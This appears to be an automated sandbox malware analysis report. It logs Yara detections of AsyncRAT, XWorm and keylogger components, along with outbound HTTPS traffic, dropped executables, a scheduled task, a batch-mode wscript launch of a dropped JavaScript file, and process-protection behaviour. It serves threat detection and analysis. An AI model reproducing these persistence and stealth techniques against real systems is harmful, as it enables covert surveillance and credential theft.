Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50207
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50328
Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50196 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50206
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50327
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50209
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50208
Source: unknown	Network traffic detected: HTTP traffic on port 50284 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50245 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50316 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50201
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50322
Source: unknown	Network traffic detected: HTTP traffic on port 50333 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50321
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50203
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50324
Source: unknown	Network traffic detected: HTTP traffic on port 50097 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50290 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50239 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49993 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50273 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50327 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50101 -> 443

Source: unknown	HTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.5:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.5:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.5:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.5:49711 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.197.127.21:443 -> 192.168.2.5:49993 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.5:50018 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 116.202.5.153:443 -> 192.168.2.5:50019 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Yara detected AsyncRAT

Source: Yara match	File source: 29.2.regsvr32.exe.8a0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 44.3.Macromedia.com.4055ad0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 52.2.MSBuild.exe.bc0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 44.3.Macromedia.com.4055ad0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.regsvr32.exe.8a0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 44.3.Macromedia.com.406c2e0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.regsvr32.exe.20e131e.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.regsvr32.exe.66ca5e.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 44.3.Macromedia.com.4055ad0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 44.3.Macromedia.com.4055ad0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.regsvr32.exe.66ca5e.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.regsvr32.exe.20e131e.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000002C.00000003.3252145471.0000000004061000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.3319737101.0000000001837000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.3319485520.0000000004056000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.3250710054.0000000003FDB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.4573572672.00000000008A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.3322775695.000000000182E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.3319485520.000000000407E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.3319485520.000000000406E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.3255556898.0000000004055000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000034.00000002.4566675637.0000000000BC2000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.4575261917.00000000020E0000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.3319803924.0000000001824000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.4569892251.000000000064B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.3250710054.000000000404A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Macromedia.com PID: 1124, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 4724, type: MEMORYSTR

Yara detected Keylogger Generic

Source: Yara match

File source: Process Memory Space: regsvr32.exe PID: 1788, type: MEMORYSTR

Contains functionality to log keystrokes (.Net Source)

Source: 29.2.regsvr32.exe.8a0000.1.raw.unpack, XLogger.cs	.Net Code: KeyboardLayout
Source: 29.2.regsvr32.exe.66ca5e.0.raw.unpack, XLogger.cs	.Net Code: KeyboardLayout
Source: 29.2.regsvr32.exe.20e131e.2.raw.unpack, XLogger.cs	.Net Code: KeyboardLayout

Source: C:\Windows\System32\regsvr32.exe

Window created: window name: CLIPBRDWNDCLASS

Operating System Destruction

Protects its processes via BreakOnTermination flag

Source: C:\Windows\System32\regsvr32.exe

Process information set: 01 00 00 00

System Summary

Malicious sample detected (through community Yara rule)

Source: 29.2.regsvr32.exe.8a0000.1.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 29.2.regsvr32.exe.8a0000.1.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 44.3.Macromedia.com.4055ad0.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 44.3.Macromedia.com.4055ad0.0.unpack, type: UNPACKEDPE	Matched rule: Detect AsyncRAT based on specific strings Author: Sekoia.io
Source: 44.3.Macromedia.com.4055ad0.0.unpack, type: UNPACKEDPE	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 52.2.MSBuild.exe.bc0000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 52.2.MSBuild.exe.bc0000.0.unpack, type: UNPACKEDPE	Matched rule: Detect AsyncRAT based on specific strings Author: Sekoia.io
Source: 52.2.MSBuild.exe.bc0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 44.3.Macromedia.com.4055ad0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 44.3.Macromedia.com.4055ad0.1.unpack, type: UNPACKEDPE	Matched rule: Detect AsyncRAT based on specific strings Author: Sekoia.io
Source: 44.3.Macromedia.com.4055ad0.1.unpack, type: UNPACKEDPE	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 29.2.regsvr32.exe.8a0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 29.2.regsvr32.exe.8a0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 44.3.Macromedia.com.406c2e0.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 44.3.Macromedia.com.406c2e0.2.unpack, type: UNPACKEDPE	Matched rule: Detect AsyncRAT based on specific strings Author: Sekoia.io
Source: 44.3.Macromedia.com.406c2e0.2.unpack, type: UNPACKEDPE	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 29.2.regsvr32.exe.20e131e.2.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 29.2.regsvr32.exe.20e131e.2.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 29.2.regsvr32.exe.66ca5e.0.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 29.2.regsvr32.exe.66ca5e.0.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 44.3.Macromedia.com.4055ad0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 44.3.Macromedia.com.4055ad0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detect AsyncRAT based on specific strings Author: Sekoia.io
Source: 44.3.Macromedia.com.4055ad0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 44.3.Macromedia.com.4055ad0.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 44.3.Macromedia.com.4055ad0.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detect AsyncRAT based on specific strings Author: Sekoia.io
Source: 44.3.Macromedia.com.4055ad0.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 29.2.regsvr32.exe.66ca5e.0.raw.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 29.2.regsvr32.exe.66ca5e.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 29.2.regsvr32.exe.20e131e.2.raw.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 29.2.regsvr32.exe.20e131e.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0000002C.00000003.3252145471.0000000004061000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 0000002C.00000003.3252145471.0000000004061000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 0000002C.00000003.3319737101.0000000001837000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 0000002C.00000003.3319485520.0000000004056000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 0000002C.00000003.3319485520.0000000004056000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 0000002C.00000003.3250710054.0000000003FDB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 0000002C.00000003.3250710054.0000000003FDB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 0000001D.00000002.4573572672.00000000008A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 0000001D.00000002.4573572672.00000000008A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0000002C.00000003.3319485520.000000000407E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 0000002C.00000003.3319485520.000000000406E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 0000002C.00000003.3255556898.0000000004055000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 0000002C.00000003.3255556898.0000000004055000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 00000034.00000002.4566675637.0000000000BC2000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 0000001D.00000002.4575261917.00000000020E0000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0000002C.00000003.3319803924.0000000001824000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 0000002C.00000003.3319803924.0000000001824000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 0000001D.00000002.4569892251.000000000064B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0000002C.00000003.3250710054.000000000404A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 0000002C.00000003.3250710054.000000000404A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: Process Memory Space: Macromedia.com PID: 1124, type: MEMORYSTR	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: Process Memory Space: MSBuild.exe PID: 4724, type: MEMORYSTR	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen

PE file contains section with special chars

Source: SQ1NgqeTQy.exe	Static PE information: section name:
Source: SQ1NgqeTQy.exe	Static PE information: section name: .idata
Source: SQ1NgqeTQy.exe	Static PE information: section name:
Source: VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe.0.dr	Static PE information: section name:
Source: VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe.0.dr	Static PE information: section name: .idata
Source: VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe.0.dr	Static PE information: section name:
Source: 78K21CNZITPIMAK88B8Q.exe.0.dr	Static PE information: section name:
Source: 78K21CNZITPIMAK88B8Q.exe.0.dr	Static PE information: section name: .idata
Source: skotes.exe.4.dr	Static PE information: section name:
Source: skotes.exe.4.dr	Static PE information: section name: .idata
Source: random[1].exe0.8.dr	Static PE information: section name:
Source: random[1].exe0.8.dr	Static PE information: section name: .idata
Source: random[1].exe0.8.dr	Static PE information: section name:
Source: f35b37b5a5.exe.8.dr	Static PE information: section name:
Source: f35b37b5a5.exe.8.dr	Static PE information: section name: .idata
Source: f35b37b5a5.exe.8.dr	Static PE information: section name:

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Wscript called in batch mode (surpress errors)

Source: unknown

Process created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.js"

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\AppData\Local\Temp\78K21CNZITPIMAK88B8Q.exe	File created: C:\Windows\Tasks\skotes.job	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062161001\ca3f738a4c.exe	File created: C:\Windows\DpInvestigated	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062161001\ca3f738a4c.exe	File created: C:\Windows\PromotionalToken	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062161001\ca3f738a4c.exe	File created: C:\Windows\PropeciaJoan	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062161001\ca3f738a4c.exe	File created: C:\Windows\WestCornell	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062164001\94cd0458cc.exe	File created: C:\Windows\SchedulesAb
Source: C:\Users\user\AppData\Local\Temp\1062164001\94cd0458cc.exe	File created: C:\Windows\ContainsBefore
Source: C:\Users\user\AppData\Local\Temp\1062164001\94cd0458cc.exe	File created: C:\Windows\TokenDetroit
Source: C:\Users\user\AppData\Local\Temp\1062164001\94cd0458cc.exe	File created: C:\Windows\AttacksContacted
Source: C:\Windows\System32\svchost.exe	File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Source: C:\Users\user\AppData\Local\Temp\78K21CNZITPIMAK88B8Q.exe	Code function: 4_2_00595C83	4_2_00595C83
Source: C:\Users\user\AppData\Local\Temp\78K21CNZITPIMAK88B8Q.exe	Code function: 4_2_0059735A	4_2_0059735A
Source: C:\Users\user\AppData\Local\Temp\78K21CNZITPIMAK88B8Q.exe	Code function: 4_2_005D8860	4_2_005D8860
Source: C:\Users\user\AppData\Local\Temp\78K21CNZITPIMAK88B8Q.exe	Code function: 4_2_006A8101	4_2_006A8101
Source: C:\Users\user\AppData\Local\Temp\78K21CNZITPIMAK88B8Q.exe	Code function: 4_2_00594DE0	4_2_00594DE0
Source: C:\Users\user\AppData\Local\Temp\78K21CNZITPIMAK88B8Q.exe	Code function: 4_2_00594B30	4_2_00594B30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 5_2_00C678BB	5_2_00C678BB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 5_2_00C67049	5_2_00C67049
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 5_2_00C68860	5_2_00C68860
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 5_2_00C631A8	5_2_00C631A8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 5_2_00C24B30	5_2_00C24B30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 5_2_00C24DE0	5_2_00C24DE0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 5_2_00C62D10	5_2_00C62D10
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 5_2_00C6779B	5_2_00C6779B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 5_2_00C57F36	5_2_00C57F36

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 00C380C0 appears 130 times
Source: C:\Users\user\AppData\Local\Temp\78K21CNZITPIMAK88B8Q.exe	Code function: String function: 005A80C0 appears 130 times

Source: random[1].exe.8.dr	Static PE information: Resource name: RT_VERSION type: 0420 Alliant virtual executable common library not stripped
Source: ca3f738a4c.exe.8.dr	Static PE information: Resource name: RT_VERSION type: 0420 Alliant virtual executable common library not stripped
Source: random[1].exe1.8.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: 21a4f8ff7d.exe.8.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: 21a4f8ff7d.tmp.24.dr	Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: 21a4f8ff7d.tmp.24.dr	Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Source: 21a4f8ff7d.tmp.26.dr	Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: 21a4f8ff7d.tmp.26.dr	Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Source: is-SSA0P.tmp.27.dr	Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: is-SSA0P.tmp.27.dr	Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows

Source: is-KKQ75.tmp.27.dr

Static PE information: Number of sections : 23 > 10

Source: random[2].exe.8.dr	Static PE information: No import functions for PE file found
Source: 52d42007e3.exe.8.dr	Static PE information: No import functions for PE file found

Source: random[2].exe.8.dr	Static PE information: Data appended to the last section found
Source: 52d42007e3.exe.8.dr	Static PE information: Data appended to the last section found

Source: SQ1NgqeTQy.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 29.2.regsvr32.exe.8a0000.1.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 29.2.regsvr32.exe.8a0000.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 44.3.Macromedia.com.4055ad0.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 44.3.Macromedia.com.4055ad0.0.unpack, type: UNPACKEDPE	Matched rule: rat_win_asyncrat author = Sekoia.io, description = Detect AsyncRAT based on specific strings, creation_date = 2023-01-25, classification = TLP:CLEAR, version = 1.0, id = d698e4a1-77ff-4cd7-acb3-27fb16168ceb
Source: 44.3.Macromedia.com.4055ad0.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 52.2.MSBuild.exe.bc0000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 52.2.MSBuild.exe.bc0000.0.unpack, type: UNPACKEDPE	Matched rule: rat_win_asyncrat author = Sekoia.io, description = Detect AsyncRAT based on specific strings, creation_date = 2023-01-25, classification = TLP:CLEAR, version = 1.0, id = d698e4a1-77ff-4cd7-acb3-27fb16168ceb
Source: 52.2.MSBuild.exe.bc0000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 44.3.Macromedia.com.4055ad0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 44.3.Macromedia.com.4055ad0.1.unpack, type: UNPACKEDPE	Matched rule: rat_win_asyncrat author = Sekoia.io, description = Detect AsyncRAT based on specific strings, creation_date = 2023-01-25, classification = TLP:CLEAR, version = 1.0, id = d698e4a1-77ff-4cd7-acb3-27fb16168ceb
Source: 44.3.Macromedia.com.4055ad0.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 29.2.regsvr32.exe.8a0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 29.2.regsvr32.exe.8a0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 44.3.Macromedia.com.406c2e0.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 44.3.Macromedia.com.406c2e0.2.unpack, type: UNPACKEDPE	Matched rule: rat_win_asyncrat author = Sekoia.io, description = Detect AsyncRAT based on specific strings, creation_date = 2023-01-25, classification = TLP:CLEAR, version = 1.0, id = d698e4a1-77ff-4cd7-acb3-27fb16168ceb
Source: 44.3.Macromedia.com.406c2e0.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 29.2.regsvr32.exe.20e131e.2.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 29.2.regsvr32.exe.20e131e.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 29.2.regsvr32.exe.66ca5e.0.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 29.2.regsvr32.exe.66ca5e.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 44.3.Macromedia.com.4055ad0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 44.3.Macromedia.com.4055ad0.1.raw.unpack, type: UNPACKEDPE	Matched rule: rat_win_asyncrat author = Sekoia.io, description = Detect AsyncRAT based on specific strings, creation_date = 2023-01-25, classification = TLP:CLEAR, version = 1.0, id = d698e4a1-77ff-4cd7-acb3-27fb16168ceb
Source: 44.3.Macromedia.com.4055ad0.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
